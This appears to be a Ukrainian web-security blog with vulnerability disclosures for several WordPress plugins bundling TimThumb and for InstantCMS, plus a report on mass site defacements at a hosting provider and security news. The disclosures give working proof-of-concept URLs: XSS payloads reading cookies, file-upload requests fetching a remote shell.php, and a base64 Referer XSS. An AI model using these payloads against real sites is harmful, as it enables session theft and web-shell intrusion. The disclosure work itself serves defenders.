Websecurity - Веб безпека

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokIntroScroller і RokMicroNews для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в RokStories і RokNewsPager.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Вразливі RokIntroScroller 1.8 і попередні версії та RokMicroNews 1.5 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokIntroScroller та RokMicroNews.

Торік я писав про численні уразливості в Rokbox для WordPress. А минулого тижня я виявив численні уразливості в плагінах RokStories і RokNewsPager для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості.

Стосовно плагінів для WordPress раніше я писав про уразливості в WPtouch і WPtouch Pro.

В цих плагінах для WordPress використовуються TimThumb (окрім Rokbox, розробники включили його в інші свої плагіни). Тому вони мають всі дірки TimThumb, які я оприлюднив ще в 2011 році.

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

А також FPD, Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokstories/rokstories.php
http://site/wp-content/plugins/wp_roknewspager/roknewspager.php

Вразливі RokStories 1.25 і попередні версії та RokNewsPager 1.17 і попередні версії. А до останньої FPD вразливі всі версії плагінів RokStories та RokNewsPager.

В липні відбувся новий масовий взлом сайтів на сервері HostPro. Він тривав 24.12.2011, 14.06.2012-17.09.2012 і 16.01.2013-24.08.2013. Десятий масовий взлом сайтів на сервері HostPro відбувся раніше.

Був взломаний сервер української компанії HostPro. Взлом складався з багатьох невеликих дефейсів і трьох крупних дефейсів сайтів.

Спочатку було взломано 132 сайти, а потім ще 56 - всього 188 сайтів на сервері хостера HostPro (IP 194.28.85.190). Перелік сайтів можете подивитися на www.zone-h.org. Серед них українські державні сайти www.police.gov.ua, dndc-uz.gov.ua та www.manrayrada.gov.ua, який був взломаний двічі (в 2012 і 2013 роках).

З зазначених 188 сайтів 7 сайтів були взломані хакерами з holy lycans, 45 сайтів хакерами з Lopht Crews, 3 сайти хакером CoupDeGrace, 4 сайти хакером Hmei7, 1 сайт хакером Moroccan Hassan, 3 сайти хакером Kurd007, 74 сайти хакером NeT.Defacer, 10 сайтів хакерами з P4kurd-TeaM, 8 сайів хакером Harez Kurdstan, 2 сайти хакером ghost-dz, 2 сайти хакером misafir, 25 сайтів хакерами з AHS-CREW та 1 сайт хакером WeWe ArAr.

Якщо невеликі дефейси по одному або кілька сайтів явно були зроблені при взломах окремих сайтів, то стосовно великих дефейсів Lopht Crews, NeT.Defacer, P4kurd-TeaM та AHS-CREW можна сказати, що враховуючи дефейс великої кількості сайтів за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

У вересні, 11.09.2013, вийшла нова версія WordPress 3.6.1.

WordPress 3.6.1 це секюріті та багфікс випуск нової 3.6 серії. В якому розробники виправили декілька уразливостей і 13 багів. Причому окрім трьох дірок, вони зробили одне покращення безпеки (security hardening) в аплоадері, не зараховуючи його до виправлень уразливостей (як це вони полюбляють робити), хоча це також уразливість. До того ж виправлення в аплоадері лише часткові: вони передовсім стосуються обмежених акаунтів, а через акаунт адміна все ще можна проводити атаки.

Стосовно покращення безпеки, то були виправлені наступні уразливості: Remote Code Execution через небезпечну десеріалізацію PHP, Link Injection (Open Redirect) та Privilege Escalation. А також оновлені секюріті обмеження в аплоадері для протидії Cross-Site Scripting атакам.

В даній добірці експлоіти в веб додатках:

• Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities (деталі)
• Router ONO Hitron CDE-30364 - CSRF Vulnerability (деталі)
• Belkin G Wireless Router Firmware 5.00.12 - RCE PoC (деталі)
• SPIP connect Parameter PHP Injection Vulnerability (деталі)
• Firefox XMLSerializer Use After Free Vulnerability (деталі)

17.07.2013

У липні, 14.07.2013, я знайшов Cross-Site Scripting та Redirector уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.09.2013

Cross-Site Scripting (WASC-08):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Redirector (URL Redirector Abuse) (WASC-38):

GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.

Referer: http://websecurity.com.ua

Вразливі InstantCMS 1.10.2 та попередні версії.

Дані уразливості досі не виправлені.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://donpfu.gov.ua - інфікований державний сайт - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://poiskuha.com.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://real1.com.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://papovs.com.ua - інфекція була виявлена 03.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://informax.kiev.ua - інфекція була виявлена 02.07.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95 (деталі)
• XSS Vulnerabilities in OpenCms (деталі)
• Little CMS vulnerability (деталі)
• Verax NMS Password Replay Attack (деталі)
• Verax NMS Authenication Bypass (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах VideoWhisper, Post-Gallery та Simple Login Registration. Для котрих з’явилися експлоіти. VideoWhisper - це плагін для трансляції відео, Post-Gallery - це плагін для створення галерей, Simple Login Registration - це форма реєстрації та логіна.

• WordPress Video Whisper Cross Site Scripting (деталі)
• WordPress Post-Gallery Cross Site Scripting (деталі)
• WordPress Simple Login Registration 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, Google знає майже всі WiFi-паролі у світі.

Якщо ваш Android-пристрій (смарфтон чи планшет) коли-небудь авторизувався в якому-небудь WiFi-хотспоті, то з великою імовірністю пароль від хотспота став відомий також і компанії Google. З огляду на те, як багато “андроїдів” ходить по світу, можна припустити, що в Google є доступ практично до всіх запаролених точок доступу у світі.

Починаючи з версії Android 2.2 операційна система сконфігурована за замовчуванням на автоматичний бекап налаштувань системи. Серед налаштувань на сервери Google передаються також паролі від точок доступу в незашифрованому вигляді.

За повідомленням www.opennet.ru, більше 10% з мільйона найбільших веб сайтів небезпечні.

Компанія, що спеціалізується в області комп’ютерної безпеки, Sucuri опублікувала результати дослідження безпеки мільйона найбільших сайтів Мережі, представлених у рейтингу Alexa. Проаналізувавши дані сайти дослідники виявили, що 108781 з них (10,9%) мають явні проблеми з безпекою чи вже уражені шкідливим ПЗ.

Зокрема, 2% сайтів (18557) виявилися внесені у відомі чорні списки антивірусних компаній і пошукових систем. Цікаво, що Yandex заблокував помітно більше сайтів (2154 сайта), чим Google (357 сайтів). З антивірусних компаній з великим відривом лідирує McAfee, що заблокував 11 тисяч сайтів.

За повідомленням www.xakep.ru, ментальне стомлення: користувачі ігнорують до 70% попереджень у браузері.

Учені з університету Берклі разом з розробниками з Google опублікували результати дослідження зі статистикою по 25,4 мільйонів попереджень про загрози безпеки, показаних у браузерах Google Chrome і Mozilla Firefox у травні-червні 2013 року.

Як з’ясувалося, 15,1% користувачів не реагують на повідомлення про присутність шкідливого коду на сайті (7,1% аудиторії Firefox і 23,5% аудиторії Chrome).

Для попереджень про фішинг CTR складає 20,4%, тут найменш обережні користувачі під Linux (32,9%).

Найчастіше користувачі ігнорують попередження про невідповідність SSL-сертифіката: залишено без уваги 70,2% попереджень у Chrome і 33,0% попереджень у Firefox.